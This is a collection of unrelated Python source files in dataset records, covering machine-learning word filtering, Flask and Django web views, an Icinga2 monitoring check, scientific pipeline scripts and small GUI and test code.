predict_result2=torch.zeros(len(current_input),1,dtype=torch.float32)\r\n with torch.no_grad():\r\n for i in range(int(len(current_input)/100)+1):\r\n predict_result2[i*100:min((i+1)*100,len(current_input))]=model5.model1(torch.tensor(current_input[i*100:min((i+1)*100,len(current_input)),:], dtype=torch.float, device=device).unsqueeze(1))\r\n\r\n pred_adv_np2=predict_result2.cpu().detach().numpy()\r\n sort_of_adv2=sorted(range(len(pred_adv_np2)), key=lambda k: -pred_adv_np2[k])\r\n output_adv2=np.array(idxs_words)[sort_of_adv2[:500]]\r\n# =============================================================================\r\n import re\r\n def is_good(w):\r\n if re.findall(u'[\\u4e00-\\u9fa5]', w) \\\r\n and len(w) >= 2\\\r\n and not re.findall(u'[较很越增]|[多少大小长短高低好差]', w)\\\r\n and not (u'代上级' in w or u'唔知' in w or u'唔该' in w or u'曾经' in w or u'施主' in w or u'为何' in w or u'风流' in w or u'招聘' in w or u'夏令营' in w or u'继续' in w or u'跆拳道' in w or u'西红柿' in w or u'满群' in w or u'汽油' in w or u'处理' in w or u'霸王餐' in w or u'帅哥美女' in w or u'兄弟姐妹' in w or u'党费' in w or u'资料费' in w or u'电费' in w or u'生活费' in w or u'车费' in w or u'气费' in w or u'报名费' in w or u'出现' in w or u'有求' in w or u'情谊' in w or u'永不' in w or u'坚决' in w)\\\r\n and not w[-1] in u'们啦我你他投图机抢的送班购了吗群轮店货日啊好的个是国春爱哟哦'\\\r\n and not w[:1] in [u'求',u'情',u'杨',u'心',u'昨',u'那',u'赚',u'给',u'这',u'收',u'今',u'送',u'的',u'祝',u'每',u'不',u'有',u'你',u'我',u'他',u'她',u'它']\\\r\n and not w[:3] in [u'朋友圈']\\\r\n and not w[-2:] in [u'开始',u'返现',u'新人',u'求助',u'完成',u'烦躁',u'守候',u'基金',u'志明',u'春娇',u'殿明',u'兑现',u'不起']\\\r\n and not w[2:] in [u'发起',u'圆满',u'推荐',u'慈善',u'美好',u'冻结']\\\r\n and not w[-3:] in [u'倒计时',u'玻尿酸',u'睫毛膏',u'精华液']:\r\n return True\r\n else:\r\n return False\r\n# \r\n import AhoCorasickTree as ACT \r\n def build_ac_tree(pattern_word_list):\r\n \r\n ac = ACT.ACTree()\r\n ac.build(pattern_word_list)\r\n \r\n return ac\r\n# \r\n fields=['key'] \r\n df_city = pd.read_csv('./data/citylist.csv',encoding='utf-8', usecols=fields)\r\n city_list=np.squeeze(np.array(df_city.values.tolist())).tolist()\r\n AC_Tree_City=build_ac_tree(city_list)\r\n def is_not_city(w):\r\n match_res = AC_Tree_City.match(w)\r\n words_set=set(match_res)\r\n if not 
words_set:\r\n            return True\r\n        else:\r\n            return False\r\n    import codecs\r\n    name_list = codecs.open('./data/Chinese_Names_120W.txt', 'r', 'utf-8').read().split()\r\n    chengyu_list = codecs.open('./data/ChengYu_5W.txt', 'r', 'utf-8').read().split()\r\n    relationship_list = codecs.open('./data/Chinese_Relationship.txt', 'r', 'utf-8').read().split()\r\n    AC_Tree_name_chengyu=build_ac_tree(name_list+chengyu_list+relationship_list)\r\n    def is_not_name_or_chengyu(w):\r\n        match_res = AC_Tree_name_chengyu.match(w)\r\n        words_set=set(match_res)\r\n        if not words_set:\r\n            return True\r\n        else:\r\n            return False\r\n# =============================================================================\r\n    output_version='1120'\r\n    word_output_adv_clear=[i for i in output_adv if is_good(i) and is_not_city(i) and is_not_name_or_chengyu(i)]\r\n    pd.DataFrame(np.array(word_output_adv_clear).reshape((len(word_output_adv_clear),1))).to_csv('york_gamble_newwords'+output_version+'_adv.csv',encoding='utf-8-sig')\r\n    clf = svm.SVC(gamma='scale',probability=True, kernel = 'linear')\r\n    clf.fit(X1, Y1)\r\n    y_pred_svm=clf.predict(current_input)\r\n    sort_of_svm=sorted(range(len(y_pred_svm)), key=lambda k: -y_pred_svm[k])\r\n    output_svm=np.array(idxs_words)[sort_of_svm[0:500]]\r\n    word_output_svm_clear=[i for i in output_svm if is_good(i) and is_not_city(i) and is_not_name_or_chengyu(i)]\r\n    pd.DataFrame(np.array(word_output_svm_clear).reshape((len(word_output_svm_clear),1))).to_csv('york_gamble_newwords'+output_version+'_svm.csv',encoding='utf-8-sig')\r\n    from sklearn.neural_network import MLPClassifier\r\n    clf = MLPClassifier(solver='lbfgs', alpha=1e-5,\r\n                        hidden_layer_sizes=(global_input_size, global_input_size), random_state=1)\r\n    clf.fit(X1, Y1) \r\n    y_pred_mlp=clf.predict(current_input)\r\n    sort_of_mlp=sorted(range(len(y_pred_mlp)), key=lambda k: -y_pred_mlp[k])\r\n    output_mlp=np.array(idxs_words)[sort_of_mlp[0:500]]\r\n    word_output_mlp_clear=[i for i in output_mlp if is_good(i) and is_not_city(i) and is_not_name_or_chengyu(i)]\r\n    pd.DataFrame(np.array(word_output_mlp_clear).reshape((len(word_output_mlp_clear),1))).to_csv('york_gamble_newwords'+output_version+'_mlp.csv',encoding='utf-8-sig')\r\n    ","sub_path":"pytorch_cnn_adv_training_20191120_word2vec.py","file_name":"pytorch_cnn_adv_training_20191120_word2vec.py","file_ext":"py","file_size_in_byte":44282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"75593416","text":"from flask import Flask, render_template, url_for, request, redirect\nfrom Algorithm.earliest_algorithm_MYSQLver import run_the_algorithm\nimport mysql.connector\n\napp = Flask(__name__)\n\n@app.route('/', methods = ['GET', 'POST'])\ndef index():\n    if request.method == 'POST':\n        return redirect(url_for('search_result', start=request.form['start'], goal=request.form['goal']))\n    return render_template('index.html')\n\n@app.route('/result?start=<start>&goal=<goal>')\ndef search_result(start, goal):\n    result = run_the_algorithm(start, goal)\n    return render_template('search_result.html', result=result)\n\n\n@app.template_filter('remove_second')\ndef remove_second_from_time(time):\n    time = time.split(':')\n    new_time = time[0] + ':' + time[1]\n    return new_time\n\n@app.template_filter('decode_station_name')\ndef decode_station_name(station):\n    for x in data:\n        if station in x:\n            return x[0]\n\n@app.template_filter('decode_train_class')\ndef decode_train_class(train_class):\n    Limited_Express = [1100, 1101, 1103, 1108]\n    Tarko = 1102\n    Puyuma 
= 1107\n Express = [1110, 1111, 1114, 1115]\n Rapid = [1120]\n Local = [1131, 1132, 1140]\n\n train=None\n if train_class in Limited_Express:\n train = '自強號'\n elif train_class == Tarko:\n train = '太魯閣號'\n elif train_class == Puyuma:\n train = '普悠瑪號'\n elif train_class in Express:\n train = '莒光號'\n elif train_class in Rapid:\n train = '復興號'\n elif train_class in Local:\n train = '區間車'\n return train\n\n\nif __name__ == \"__main__\":\n app.debug = True\n conn = mysql.connector.connect(user='root',\n password='testpassword',\n host='127.0.0.1',\n database='test')\n cur = conn.cursor(buffered=True)\n cur.execute('SELECT station, station_code FROM train_station_info;')\n data = cur.fetchall()\n cur.close()\n conn.close()\n app.run()","sub_path":"Transport navigation Website/main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"184702718","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# (c) 2018, René Moser \n\n\nfrom __future__ import print_function\n\nimport sys\nimport argparse\nimport requests\nimport json\n\nrequests.packages.urllib3.disable_warnings()\n\n\ndef main():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('--protocol', default='https', help='Protocol to be used, default https')\n parser.add_argument('--port', type=int, default=443, help='Port used, default 443')\n parser.add_argument('--host', default=\"localhost\", help='Host, default localhost')\n parser.add_argument('--username', help='Icinga2 username')\n parser.add_argument('--password', default=\"\", help='Icinga2 password')\n\n args = parser.parse_args()\n\n headers = {\n 'Accept': 'application/json',\n 'X-HTTP-Method-Override': 'GET',\n }\n url = \"%s://%s:%s/v1/objects/services\" % (args.protocol, args.host, args.port)\n\n data = {\n 'joins': ['host.name'],\n 'filter': 'match(\"CloudStack Router Rebooted Unconfigured\", service.name)'\n }\n\n resp = requests.post(url, headers=headers, auth=(args.username, args.password), data=json.dumps(data), verify=False)\n\n routers_list = []\n routers_in_error_state_list = []\n\n if resp.status_code == 200:\n for result in resp.json().get('results') or []:\n host_name = result.get('attrs').get('host_name')\n routers_list.append(host_name)\n if result.get('attrs').get('last_hard_state') == 2:\n routers_in_error_state_list.append(host_name)\n else:\n print(\"UNKNOWN: URL %s returned %s\" % (url, resp.status_code))\n sys.exit(3)\n\n count_results = len(routers_list)\n error_count_results = len(routers_in_error_state_list)\n\n if len(routers_in_error_state_list) > 0:\n print(\"ERROR: %s of %s routers unhealthy: %s\" % (error_count_results, count_results, ', '.join(routers_in_error_state_list)))\n sys.exit(2)\n\n if not count_results:\n print(\"WARNING: no results, filter?\")\n sys.exit(1)\n\n print(\"OK: %s routers healthy\" % count_results)\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except Exception as e:\n print(\"UNKNOWN: %s\" % str(e))\n sys.exit(3)\n","sub_path":"check_any_routers_unconfigured.py","file_name":"check_any_routers_unconfigured.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"339945035","text":"import pytest\nimport numpy as np\n\n# from sklearn.utils import assert_array_equal\n# from sklearn.utils import assert_allclose\n\nfrom GLE_analysisEM import GLE_Estimator, 
GLE_BasisTransform, sufficient_stats, sufficient_stats_hidden, preprocessingTraj\nfrom ..utils import loadTestDatas_est, generateRandomDefPosMat\n\n\n@pytest.fixture\ndef data():\n return [\"GLE_analysisEM/tests/0_trajectories.dat\"]\n\n\ndef test_gen_random_mat():\n A = generateRandomDefPosMat()\n assert np.all(np.linalg.eigvals(A + A.T) > 0)\n\n\n# def test_basis_proj(data):\n# transform = GLE_BasisTransform(dim_x=1)\n#\n#\n# def test_user_input(data):\n# est = GLE_Estimator(init_params=\"user\")\n#\n#\n# def test_markov_input(data):\n# est = GLE_Estimator(init_params=\"markov\")\n#\n\n\ndef test_m_step_aboba(data):\n est = GLE_Estimator()\n X, idx, Xh = loadTestDatas_est(data, 1, 1)\n basis = GLE_BasisTransform()\n X = basis.fit_transform(X)\n est.dt = X[1, 0] - X[0, 0]\n est._check_n_features(X)\n est._check_initial_parameters()\n Xproc, idx = preprocessingTraj(X, idx_trajs=idx, dim_x=est.dim_x)\n traj_list = np.split(Xproc, idx)\n traj_list_h = np.split(Xh, idx)\n\n datas = 0.0\n for n, traj in enumerate(traj_list):\n datas_visible = sufficient_stats(traj, est.dim_x)\n zero_sig = np.zeros((len(traj), 2 * est.dim_h, 2 * est.dim_h))\n muh = np.hstack((np.roll(traj_list_h[n], -1, axis=0), traj_list_h[n]))\n datas += sufficient_stats_hidden(muh, zero_sig, traj, datas_visible, est.dim_x, est.dim_h, est.dim_coeffs_force) / len(traj_list)\n est._initialize_parameters(datas_visible / len(traj_list), np.random.default_rng())\n logL1, _ = est.loglikelihood(datas)\n est._m_step(datas)\n logL2, _ = est.loglikelihood(datas)\n assert logL2 > logL1\n\n\ndef test_e_step_aboba(data):\n\n est = GLE_Estimator(C_init=np.identity(2), A_init=np.array([[5, 1.0], [-2.0, 0.07]]), force_init=np.array([-1]), init_params=\"user\")\n X, idx, Xh = loadTestDatas_est(data, 1, 1)\n basis = GLE_BasisTransform()\n X = basis.fit_transform(X)\n est.dt = X[1, 0] - X[0, 0]\n est._check_n_features(X)\n est._check_initial_parameters()\n Xproc, idx = preprocessingTraj(X, idx_trajs=idx, dim_x=est.dim_x)\n traj_list = np.split(Xproc, idx)\n traj_list_h = np.split(Xh, idx)\n datas = 0.0\n for n, traj in enumerate(traj_list):\n datas_visible = sufficient_stats(traj, est.dim_x)\n zero_sig = np.zeros((len(traj), 2 * est.dim_h, 2 * est.dim_h))\n muh = np.hstack((np.roll(traj_list_h[n], -1, axis=0), traj_list_h[n]))\n datas += sufficient_stats_hidden(muh, zero_sig, traj, datas_visible, est.dim_x, est.dim_h, est.dim_coeffs_force) / len(traj_list)\n est._initialize_parameters(datas_visible / len(traj_list), np.random.default_rng())\n\n muh, Sigh = est._e_step(traj) # Compute hidden variable distribution\n new_stat = sufficient_stats_hidden(muh, Sigh, traj, datas_visible, est.dim_x, est.dim_h, est.dim_coeffs_force)\n # assert close new_stat, datas\n # assert_array_equal(y_pred, np.ones(X.shape[0], dtype=np.int64))\n\n\ndef test_em_estimator(data):\n est = GLE_Estimator(verbose=1, C_init=np.identity(2))\n X, idx, Xh = loadTestDatas_est(data, 1, 1)\n basis = GLE_BasisTransform()\n X = basis.fit_transform(X)\n est.fit(X)\n assert est.dt == 5e-3\n assert hasattr(est, \"converged_\")\n\n # X = data[0]\n # assert_array_equal(y_pred, np.ones(X.shape[0], dtype=np.int64))\n","sub_path":"GLE_analysisEM/tests/test_estimator.py","file_name":"test_estimator.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"463500110","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom 
.serializers import CommentSerializers, CommunitySerializers\nfrom .models import Comment, Community\n\n\nclass CommunityView(APIView):\n    # POST /community\n    def post(self, request):\n        community_serializers = CommunitySerializers(data=request.data)\n        if community_serializers.is_valid():\n            community_serializers.save()\n            return Response(community_serializers.data, status=status.HTTP_201_CREATED)\n        else:\n            return Response(community_serializers.errors, status=status.HTTP_400_BAD_REQUEST)\n    # GET /community\n    # GET /community/{community_id}\n    def get(self, request, **kwargs):\n        if kwargs.get('id') is None:\n            community_queryset = Community.objects.all()\n            community_queryset_serializer = CommunitySerializers(community_queryset, many=True)\n            return Response(community_queryset_serializer.data, status=status.HTTP_200_OK)\n        else:\n            id = kwargs.get('id')\n            community_serializer = CommunitySerializers(Community.objects.get(id=id))\n            return Response(community_serializer.data, status=status.HTTP_200_OK)\n    \n    # PUT /community/{community_id}\n    def put(self, request, **kwargs):\n        if kwargs.get('id') is None:\n            return Response('invalid request', status=status.HTTP_400_BAD_REQUEST)\n        else:\n            id = kwargs.get('id')\n            community_object = Community.objects.get(id=id)\n\n            update_community_serializer = CommunitySerializers(community_object,data=request.data)\n            if update_community_serializer.is_valid():\n                update_community_serializer.save()\n                return Response(update_community_serializer.data, status=status.HTTP_200_OK)\n            else:\n                return Response(\"invalid request\", status=status.HTTP_400_BAD_REQUEST)\n    \n    # DELETE /community/{community_id}\n    def delete(self, request, **kwargs):\n        if kwargs.get('id') is None:\n            return Response('invalid request', status=status.HTTP_400_BAD_REQUEST)\n        else:\n            id = kwargs.get('id')\n            community_object = Community.objects.get(id=id)\n            community_object.delete()\n            return Response(\"deleted\", status=status.HTTP_200_OK)\n\nclass CommentView(APIView):\n    # POST /community/comment\n    def post(self, request, **kwargs):\n        comment_serializer = CommentSerializers(data=request.data)\n        if comment_serializer.is_valid():\n            comment_serializer.save()\n            return Response(comment_serializer.data, status=status.HTTP_201_CREATED)\n        else:\n            return Response(comment_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    # GET /community/comment\n    # GET /community/comment/{comment_id}\n    def get(self, request, **kwargs):\n        if kwargs.get('id') is None:\n            comment_queryset = Comment.objects.all()\n            comment_queryset_serializer = CommentSerializers(comment_queryset, many=True)\n            return Response(comment_queryset_serializer.data, status=status.HTTP_200_OK)\n        else:\n            id = kwargs.get('id')\n            comment_serializer = CommentSerializers(Comment.objects.get(id=id))\n            return Response(comment_serializer.data, status=status.HTTP_200_OK)\n\n    # PUT /community/comment/{comment_id}\n    def put(self, request, **kwargs):\n        if kwargs.get('id') is None:\n            return Response(\"invalid request\", status=status.HTTP_400_BAD_REQUEST)\n        else:\n            id = kwargs.get('id')\n            comment_object = Comment.objects.get(id=id)\n\n            update_comment_serializer = CommentSerializers(comment_object, data=request.data)\n            if update_comment_serializer.is_valid():\n                update_comment_serializer.save()\n                return Response(update_comment_serializer.data, status=status.HTTP_200_OK)\n            else:\n                return Response(\"invalid request\", status=status.HTTP_400_BAD_REQUEST)\n\n    # DELETE /community/comment/{comment_id}\n    def delete(self, request, **kwargs):\n        if kwargs.get('id') is None:\n            return 
Response('invalid request', status=status.HTTP_400_BAD_REQUEST)\n else:\n id = kwargs.get('id')\n comment_object = Comment.objects.get(id=id)\n comment_object.delete()\n return Response(\"deleted\", status=status.HTTP_200_OK)","sub_path":"backend/community/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"449392405","text":"#!/home/cc8dm/miniconda3/bin/python\n\nimport sys\nimport subprocess\nimport argparse\nimport os\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-t','--threads',default=\"1\")\nparser.add_argument('-d','--database')\nparser.add_argument('-f','--filename')\nparser.add_argument('-s','--sample_id')\n\nargs = parser.parse_args()\n\noutfile = args.sample_id+\".mash_dist.out\"\nerrfile = args.sample_id+\".mash_dist.err\"\n\nthreshold_list = [0.0,0.01,0.02,0.03,0.04,0.05,0.06,0.07,0.08,0.09,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0]\nthreshold_index = 0\n\n#Continue through while loop if the file doesn't exist or if Mash doesn't output with the current threshold\nwhile not os.path.isfile(outfile) or os.path.getsize(outfile) == 0 and os.path.getsize(errfile) == 0:\n mash_threshold = threshold_list[threshold_index]\n print(str(mash_threshold))\n command = \"mash dist -d \" + str(mash_threshold) + \" -p \" + args.threads + \" \" + args.database + \" \" + args.filename \n\n with open(outfile,\"w\") as out, open(errfile,\"w\") as err:\n process = subprocess.Popen(command,shell=True,stdout=out,stderr=err)\n process.wait()\n\n if os.path.getsize(outfile) == 0:\n threshold_index = threshold_index + 1\n","sub_path":"IVV_Pipeline/MetagenomicPipeline/Run_MashDist.py","file_name":"Run_MashDist.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"235383628","text":"from flask import Blueprint, request, render_template, redirect, url_for, flash\nfrom models.users.views import token_required\nfrom models.questions.questions import Question\n\nquestion_blueprint = Blueprint('question_view', __name__)\n\n\n@question_blueprint.route('/questions', methods=['GET', 'POST'])\n@token_required\ndef questions(current_user):\n blank_title = \"\"\n blank_question = \"\"\n if request.method == 'POST':\n title = request.form['title']\n asked_question = request.form['asked_question']\n\n if title == blank_title or asked_question == blank_question:\n if title == \"\":\n blank_title += \"This field is empty\"\n if asked_question == \"\":\n blank_question += \"This field is empty\"\n return render_template('question_view/create_question.html',\n title='New Question',\n current_user=current_user,\n blank_question=blank_question,\n blank_title=blank_title)\n\n if title == blank_title and asked_question == blank_question:\n blank_title += \"This field is empty\"\n blank_question += \"This field is empty\"\n return render_template('question_view/create_question.html',\n title='New Question',\n current_user=current_user,\n blank_question=blank_question,\n blank_title=blank_title)\n\n new_question = Question(user_id=current_user.public_id, title=title, question=asked_question)\n print(\"user_id\", new_question.user_id)\n print(\"time\" + new_question.question_timestamp)\n print(\"date\" + new_question.asked_date)\n print(\"title\" + new_question.question_title)\n print(\"text\" + new_question.question_text)\n new_question.save_to_db()\n flash('Your Question has been asked, wait for 
answers!', 'success')\n        return redirect(url_for('users_view.profile'))\n\n    return render_template('question_view/create_question.html',\n                           title='New Question',\n                           current_user=current_user,\n                           blank_question=blank_question,\n                           blank_title=blank_title)\n","sub_path":"models/questions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"412384986","text":"import cv2\nimport numpy as np\n\nhog = cv2.HOGDescriptor()\n\ndef hoggify(a,b):\n\n    data=[]\n    labels=[]\n    for i in range(a,int(b)):\n        image = cv2.imread(\"./TrainImages/pos-\"+str(i)+\".pgm\", 0)\n        dim = 128\n        img = cv2.resize(image, (dim,dim), interpolation = cv2.INTER_AREA)\n        img = hog.compute(img)\n        img = np.squeeze(img)\n        data.append(img)\n        labels.append(np.int_(1))\n\n        image = cv2.imread(\"./TrainImages/neg-\"+str(i)+\".pgm\", 0)\n        dim = 128\n        img = cv2.resize(image, (dim,dim), interpolation = cv2.INTER_AREA)\n        img = hog.compute(img)\n        img = np.squeeze(img)\n        data.append(img)\n        labels.append(np.int_(-1))\n\n    return data, labels\n\ndef svmTrain(data,labels):\n    svm=cv2.ml.SVM_create()\n    svm.setKernel(cv2.ml.SVM_LINEAR)\n    svm.setType(cv2.ml.SVM_NU_SVR)\n    svm.setNu(0.5)\n    svm.setC(0.01)\n    svm.setP(0.5)\n    svm.setDegree(0.1)\n    svm.trainAuto(data, cv2.ml.ROW_SAMPLE,labels)\n    return svm\n\ndef list_to_matrix(lst):\n    return np.stack(lst)\n\nprint(hog.getDescriptorSize())\nlst, labels = hoggify(0,100)\ndata=list_to_matrix(lst)\nlabels=np.int_(labels)\nmodel=svmTrain(data,labels)\nmodel.save(\"cars.xml\")\n\nlst, labels = hoggify(100,110)\ndata=list_to_matrix(lst)\ndata=np.float32(data)\nlab_out=model.predict(data)\n\nprint(lab_out)","sub_path":"HOGTrain.py","file_name":"HOGTrain.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"7036870","text":"import nipype.pipeline.engine as pe\nimport nipype.interfaces.utility as util\nimport nipype.interfaces.io as nio\nimport spynoza\nfrom spynoza.registration.sub_workflows import create_epi_to_T1_workflow\n\nderivatives_folder = '/data/derivatives/registration_tests/epi_to_T1w_epi'\n\ndef invert_image(input_image):\n    import nibabel as nb\n    import os\n    from spynoza.utils import fname_presuffix\n\n    image = nb.load(input_image)\n\n    data = image.get_data()\n\n    data = -data\n\n    new_image = nb.Nifti1Image(data, image.affine, image.header)\n\n    # Use the locally imported helper; the bare spynoza module is not available inside a nipype Function node.\n    new_fn = fname_presuffix(input_image, suffix='_inv', newpath='.')\n\n    new_image.to_filename(new_fn)\n\n    return new_fn\n\nfor method in ['linear_hires', 'linear_precise', 'linear_hires_intramodal.original', 'linear_hires_intramodal.invert']:\n    for run in [1,2,3,4, 5]:\n\n        name = 'test_registration_method-%s_run-%s' % (method, run)\n\n        parameter_file = '%s.json' % method.split('.')[0]\n        source_file = '/data/derivatives/mean_epi/sub-012/func/sub-012_task-binoculardots055_run-{run}_bold_mean_ref.nii.gz'.format(**locals())\n\n        wf = create_epi_to_T1_workflow(package='ants', \n                                       parameter_file=parameter_file,\n                                       apply_transform=True)\n\n        wf.get_node('ants_registration').inputs.num_threads = 8\n\n        if len(method.split('.')) > 1:\n            if method.split('.')[1] == 'invert': \n                inverter = pe.Node(util.Function(function=invert_image), name='inverter') \n                wf.connect(inverter, 'out', wf.get_node('inputspec'), 'EPI_space_file')\n        else:\n            wf.inputs.inputspec.EPI_space_file = source_file\n\n        wf.inputs.inputspec.T1_file = 
'/data/derivatives/epi_to_T1.3depi/sub-012/anat/sub-012_acq-3DEPI_T1w_ras_masked.nii.gz'\n \n ds_transformed = pe.Node(spynoza.io.bids.DerivativesDataSink(base_directory=derivatives_folder, \n suffix='bold_epi2t1w_epi'), \n name='ds_transformed',)\n ds_transformed.inputs.source_file = source_file \n wf.connect(wf.get_node(\"outputspec\"), 'transformed_EPI_space_file', ds_transformed, 'in_file')\n \n ds_transforms = pe.Node(spynoza.io.bids.DerivativesDataSink(base_directory=derivatives_folder,\n suffix='bold_epi2t1w_epi'), \n name='ds_transforms') \n ds_transforms.inputs.source_file = source_file \n wf.connect(wf.get_node(\"outputspec\"), 'EPI_T1_matrix_file', ds_transforms, 'in_file') \n \n \n from nipype.interfaces import ants\n measure_similarity = pe.Node(ants.MeasureImageSimilarity(dimension=3,\n metric='CC',\n metric_weight=1.0,\n radius_or_number_of_bins=4,\n sampling_strategy='Regular',\n sampling_percentage=1.0,\n fixed_image_mask='/data/derivatives/preproc_anat/fmriprep/sub-012/anat/sub-012_acq-highres_T1w_brainmask.nii.gz',\n fixed_image='/data/derivatives/preproc_anat/fmriprep/sub-012/anat/sub-012_acq-highres_T1w_preproc.nii.gz'),\n name='measure_similarity')\n wf.connect(wf.get_node(\"outputspec\"), 'transformed_EPI_space_file', measure_similarity, 'moving_image')\n \n \n json_similarity = pe.Node(nio.JSONFileSink(input_names=['similarity', 'method']),\n name='json_similarity')\n \n json_similarity.inputs.method = method\n wf.connect(measure_similarity, 'similarity', json_similarity, 'similarity')\n \n ds_similarity = pe.Node(spynoza.io.bids.DerivativesDataSink(base_directory=derivatives_folder,\n suffix='similarity'),\n name='ds_similarity')\n ds_similarity.inputs.source_file = source_file \n wf.connect(json_similarity, 'json_measure', ds_similarity, 'in_file')\n \n \n \n wf.run()\n","sub_path":"src/scripts/test_registration_t1w_epi.py","file_name":"test_registration_t1w_epi.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"403765591","text":"from tkinter import *\n\n\nroot = Tk()\n\nroot.title(\"My First Gui\")\n\n'''display=Entry(root,bd=20,justify=\"right\",font=(\"Ariel\",12))\ndisplay.grid(row=0,columnspan=4)\nbtn7=Button(root,text=\"7\",font=(\"Ariel\",12),bd=15).grid(row=1,column=0)\nbtn8=Button(root,text=\"8\",font=(\"Ariel\",12),bd=15).grid(row=1,column=1)\nbtn9=Button(root,text=\"9\",font=(\"Ariel\",12),bd=15).grid(row=1,column=2)\nbtn_add=Button(root,text=\"+\",font=(\"Ariel\",12),bd=15).grid(row=1,column=3)\n\n'''\ntxt=Entry(root,bd=12,font=(\"ARIEL\",16,\"bold\"))\ntxt.grid(row=0,columnspan=3)\nbtn=Button(root,text=\"7\",fg=\"red\",bg=\"yellow\",font=(\"ARIEL\",14,\"bold\"),bd=6)\nbtn.grid(row=1,column=0)\nbtn1=Button(root,text=\"8\",fg=\"red\",bg=\"yellow\",font=(\"ARIEL\",14,\"bold\"),bd=6)\nbtn1.grid(row=1,column=1)\nbtn2=Button(root,text=\"9\",fg=\"red\",bg=\"yellow\",font=(\"ARIEL\",14,\"bold\"),bd=6)\nbtn2.grid(row=1,column=2)\nroot.geometry(\"400x500+400+200\")\n#root.resizable(0,0)\nmainloop()","sub_path":"calcigui.py","file_name":"calcigui.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"132245092","text":"from __future__ import unicode_literals\n\nfrom .basejob import SingleJob\nfrom .common import string\nfrom .settings import Settings\n\ntry:\n import subprocess32 as subprocess\nexcept ImportError:\n import subprocess\n\n# 
======================<>===========================\n\n\nclass ORCAJob(SingleJob):\n    \"\"\"\n    A class representing a single computational job with ORCA\n    `Orca `\n    todo:\n        * print molecule in internal coordinates\n        * print xyz including different basis set\n    \"\"\"\n\n    def get_input(self):\n        \"\"\"\n        Transform all contents of the ``input`` branch of ``settings``\n        into a string with blocks, subblocks, keys and values. The branch\n        self.settings.input.main corresponds to the lines starting with\n        the special character ! in the ORCA input.\n\n        The ORCA *end* keyword is mandatory for only a subset of sections.\n        For instance, the following ORCA input shows how the *method*\n        and *basis* blocks use *end*.\n\n        ! UKS B3LYP/G SV(P) SV/J TightSCF Direct Grid3 FinalGrid4\n\n        %method SpecialGridAtoms 26\n                SpecialGridIntAcc 7\n                end\n        %basis NewGTO 26 \"CP(PPP)\" end\n               NewAuxGTO 26 \"TZV/J\" end\n               end\n\n        To specify where the *end* keyword must be inserted,\n        the following syntax can be used.\n\n        job = Orca(molecule=Molecule())\n        job.settings.input.main = \"UKS B3LYP/G SV(P) SV/J TightSCF Direct Grid3 FinalGrid4\"\n        job.settings.input.method.SpecialGridAtoms = 26\n        job.settings.input.method.SpecialGridIntAcc = 7\n\n        job.settings.input.basis.NewGTO._end = \"26 \\\"CP(PPP)\\\"\"\n        job.settings.input.basis.NewAuxGTO._end = \"26 \\\"TZV/J\\\"\"\n        \"\"\"\n        def get_end(s):\n            if (not isinstance(s, Settings)) or ('_end' not in s):\n                return s\n            else:\n                return '{} end'.format(s['_end'])\n\n        def pretty_print_inner(s, indent):\n            inp = ''\n            for i, (key, value) in enumerate(s.items()):\n                end = get_end(value)\n                if i == 0:\n                    inp += ' {} {}\\n'.format(key, end)\n                else:\n                    inp += '{}{} {}\\n'.format(indent, key, end)\n            return inp\n\n        def pretty_print_orca(s, indent=''):\n            inp = ''\n            if isinstance(s, Settings):\n                for k, v in s.items():\n                    if k == 'main':\n                        inp += '! 
{}\\n\\n'.format(pretty_print_orca(v, indent))\n else:\n indent2 = (len(k) + 2) * ' '\n if not isinstance(v, Settings):\n block = pretty_print_orca(v)\n else:\n block = pretty_print_inner(v, indent2)\n inp += '%{}{}{}end\\n\\n'.format(k, block, indent2)\n elif isinstance(s, list):\n for elem in s:\n inp += '{}'.format(elem)\n else:\n inp += '{}'.format(s)\n return inp\n\n inp = pretty_print_orca(self.settings.input)\n inp_mol = self.print_molecule()\n\n return inp + inp_mol\n\n def print_molecule(self):\n \"\"\"\n pretty print a molecule in the Orca format.\n \"\"\"\n mol = self.molecule\n if mol:\n if 'charge' in mol.properties and isinstance(mol.properties.charge, int):\n charge = mol.properties.charge\n else:\n charge = 0\n if 'multiplicity' in mol.properties and isinstance(mol.properties.multiplicity, int):\n multi = mol.properties.multiplicity\n else:\n multi = 1\n xyz = ''.join(at.str(symbol=True, space=11, decimal=5) for at in mol.atoms)\n return '* xyz {} {}\\n{}*\\n\\n'.format(charge, multi, xyz)\n else:\n return ''\n\n def get_runscript(self):\n \"\"\"\n Running orca is straightforward, simply:\n */absolute/path/to/orca myinput.inp*\n \"\"\"\n path = string(subprocess.check_output(['which', 'orca'])).rstrip()\n return '{} {}'.format(path, 